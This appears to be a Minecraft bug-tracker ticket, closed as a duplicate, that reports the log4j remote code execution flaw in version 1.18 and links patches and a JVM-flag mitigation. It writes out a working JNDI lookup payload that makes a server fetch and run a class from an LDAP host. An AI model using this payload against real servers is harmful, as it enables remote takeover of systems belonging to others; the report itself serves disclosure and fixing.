MC-245086

ASAP!!! RCE in log4j

If I wrote in chat
${jndi:ldap://127.0.0.1:1389/a} and create LDAP server on 1389, Minecraft will download class and try to execute this, so I can execute any app on the any Minecraft Server.

Related:
https://mobile.twitter.com/80vul/status/1468968891489857537
https://github.com/ViaVersion/VIAaaS/commit/862f5085e62eef70fb52319e0a8ad1176ca21608
https://github.com/PaperMC/Paper/commit/b475c6a683fa34156b964f751985f36a784ca0e0

I found that running the game with -Dlog4j2.formatMsgNoLookups=true flag fixes it. Please fix it ASAP!!!!

Status:Duplicate

Reporter:k0l0r3k99

Created:2021-12-09, 08:56 PM

Updated:2021-12-09, 10:49 PM

Resolved:2021-12-09, 10:20 PM

Votes:0

Watchers:1

Confirmation Status:Unconfirmed

Category:(Unassigned)

Labels:

Affects Versions:1.18

Fix Versions:-